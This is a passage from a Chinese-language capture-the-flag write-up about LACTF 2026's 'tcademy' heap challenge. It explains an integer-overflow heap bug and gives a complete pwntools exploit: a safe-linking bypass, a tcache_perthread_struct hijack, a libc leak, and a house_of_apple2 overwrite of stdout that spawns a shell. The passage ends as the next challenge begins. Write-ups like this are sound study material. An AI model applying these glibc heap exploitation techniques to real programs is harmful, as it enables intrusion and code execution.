id="checksec">checksec </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="470px" data-flex-grow="195" height="246" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/tcademy/checksec.png" width="482"></p> <p>保护全开</p> <h3 id="ida-2">IDA </h3><h4 id="main-2">main </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="214px" data-flex-grow="89" height="786" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/tcademy/main.png" width="704"></p> <p>菜单题</p> <h4 id="menu">menu </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="360px" data-flex-grow="150" height="262" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/tcademy/menu.png" width="394"></p> <h4 id="create_note">create_note </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="305px" data-flex-grow="127" height="573" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/tcademy/create_note.png" width="729"></p> <p>只有两个槽位</p> <h4 id="delete_note">delete_note </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="463px" data-flex-grow="192" height="185" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/tcademy/delete_note.png" width="357"></p> <h4 id="print_note">print_note </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="705px" data-flex-grow="294" height="153" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/tcademy/print_note.png" width="450"></p> <p>puts 可以通过溢出泄露一些内容</p> <h4 id="get_note_index">get_note_index </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="329px" data-flex-grow="137" height="312" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/tcademy/get_note_index.png" width="428"></p> <h4 id="read_data_into_note">read_data_into_note </h4><p><img alt="这是什么鸭" class="gallery-image" data-flex-basis="414px" data-flex-grow="172" height="483" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://pic.ratherhard.com/post/contest/LACTF-2026/tcademy/read_data_into_note.png" width="835"></p> <p>此处有由整数溢出造成的堆溢出漏洞</p> <h3 id="攻击思路-1">攻击思路 </h3><p>glibc 版本为 2.35 ,是高版本,有 PIE 保护,没有 hook 函数可以劫持</p> <p>所以考虑劫持某个 _IO_FILE 结构体用来 getshell ,在此之前应先 leak libc</p> <p>可以通过 tcache poisoning 去把一个 chunk 放入 unsortedbin 中来实现 libc leak</p> <p>在高版本 libc 中, tcache 劫持的要求会更加严格</p> <p>首先是 safe-linking 机制,这需要还原泄露出的 next 指针,并且 key 的生成不再与堆地址相关,改为和 canary 类似的随机 8 字节数据</p> <p>然后是分配 tcache 时的判断,决定 tcache 是否分配的标准由 entry 是否为空变为 counts 是否为 0 ,不能再简单粗暴地劫持 tcache_pthread_struct 就完事了</p> <p>对于这道题目而言,更加棘手的是同时持有的 chunk 槽位只有两个,而想要通过 tcache poisoning 把目标地址写的权限拿到手至少需要持有两个该 tcache 的 chunk ,这需要我们修改 counts ,而在能够修改 counts 之前的 tcache_pthread_struct 劫持步骤,我们必须预先申请两个相同大小的 chunk 再放入 tcache</p> <p>而且还要注意不要破坏掉 size ,破坏了也要修复,不然 delete 的时候有你好受</p> <p>在进行 unsortedbin 布置时我们采用了堆溢出修改 size 结合 counts 篡改的方式,这样可以在持有该 chunk 的情形下将其定位到 unsortedbin ,事后直接 free 即可,非常方便</p> <p>还要注意一个小细节: tcache_pthread_struct 会被劫持也会被释放,这样的话前面的一些 counts 会变得比较奇怪,而且用于劫持 tcache_pthread_struct 的那个 tcache 会废掉,需要更换 size 做接下来的步骤</p> <p>最后劫持 <em>IO_2_1_stdout</em> 打 house_of_apple2 即可</p> <h3 id="exp-1">exp </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">102</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s1">&#39;./chall_patched&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s1">&#39;chall.lac.tf&#39;</span><span class="p">,</span> <span class="mi">31144</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;./libc.so.6&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">create</span><span class="p">(</span><span class="n">index</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">content</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Choice &gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;1&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Index: &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">index</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Size: &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">size</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Data: &#39;</span><span class="p">,</span> <span class="n">content</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">delete</span><span class="p">(</span><span class="n">index</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Choice &gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;2&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Index: &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">index</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">printnote</span><span class="p">(</span><span class="n">index</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Choice &gt; &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;3&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Index: &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">index</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">calcnext</span><span class="p">(</span><span class="n">ptr</span><span class="p">,</span> <span class="n">pos</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="p">(</span><span class="n">ptr</span> <span class="o">//</span> <span class="mh">0x1000</span><span class="p">)</span> <span class="o">^</span> <span class="n">pos</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">attack</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">msize</span> <span class="o">=</span> <span class="mh">0x7</span> </span></span><span class="line"><span class="cl"> <span class="n">nsize</span> <span class="o">=</span> <span class="mh">0xf8</span> </span></span><span class="line"><span class="cl"> <span class="n">osize</span> <span class="o">=</span> <span class="mh">0xe8</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">msize</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span> <span class="c1"># build arch</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">nsize</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">delete</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">delete</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x20</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="sa">b</span><span class="s1">&#39;B&#39;</span> <span class="c1"># leak heap</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">msize</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">printnote</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;AB&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">heap</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> <span class="o">*</span> <span class="mh">0x1000</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;heap = </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">heap</span><span class="p">)</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">delete</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mh">0x18</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x101</span><span class="p">)</span> <span class="c1"># fix up</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">msize</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">delete</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">nsize</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">nsize</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">delete</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">delete</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">toentry</span> <span class="o">=</span> <span class="n">calcnext</span><span class="p">(</span><span class="n">heap</span> <span class="o">+</span> <span class="mh">0x2c0</span><span class="p">,</span> <span class="n">heap</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">)</span> <span class="c1"># tcache_pthread_struct hijack</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mh">0x18</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x91</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">toentry</span><span class="p">)</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x80</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x90</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x71</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">msize</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">delete</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">nsize</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="p">(</span><span class="n">p16</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">p16</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">*</span> <span class="mi">6</span> <span class="o">+</span> <span class="n">p16</span><span class="p">(</span><span class="mi">8</span><span class="p">))</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x80</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">nsize</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">delete</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># into unsortedbin</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x20</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="sa">b</span><span class="s1">&#39;B&#39;</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">msize</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">printnote</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;AB&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">6</span><span class="p">)</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> <span class="o">-</span> <span class="mh">0x21ace0</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;libc = </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">address</span><span class="p">)</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">delete</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mh">0x18</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x91</span><span class="p">)</span> <span class="c1"># fix up</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">msize</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">delete</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">delete</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">osize</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">osize</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">delete</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">delete</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">stdout</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;_IO_2_1_stdout_&#39;</span><span class="p">]</span> <span class="c1"># stdout hijack</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mh">0x18</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x101</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">*</span> <span class="mi">31</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x101</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">*</span> <span class="mi">31</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0xf1</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">calcnext</span><span class="p">(</span><span class="n">heap</span> <span class="o">+</span> <span class="mh">0x4c0</span><span class="p">,</span> <span class="n">stdout</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">msize</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">delete</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">osize</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">fake_io</span> <span class="o">=</span> <span class="n">flat</span><span class="p">({</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x0</span><span class="p">:</span> <span class="sa">b</span><span class="s2">&#34; sh;&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x28</span><span class="p">:</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x88</span><span class="p">:</span> <span class="n">heap</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0xA0</span><span class="p">:</span> <span class="n">stdout</span> <span class="o">-</span> <span class="mh">0x40</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0xD8</span><span class="p">:</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;_IO_wfile_jumps&#39;</span><span class="p">]</span> <span class="o">-</span> <span class="mh">0x20</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="n">filler</span><span class="o">=</span><span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x00</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;stdout = </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">stdout</span><span class="p">)</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">create</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">osize</span><span class="p">,</span> <span class="n">fake_io</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">attack</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="ourukla">ourUKLA </h2><h3 id="code">code </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 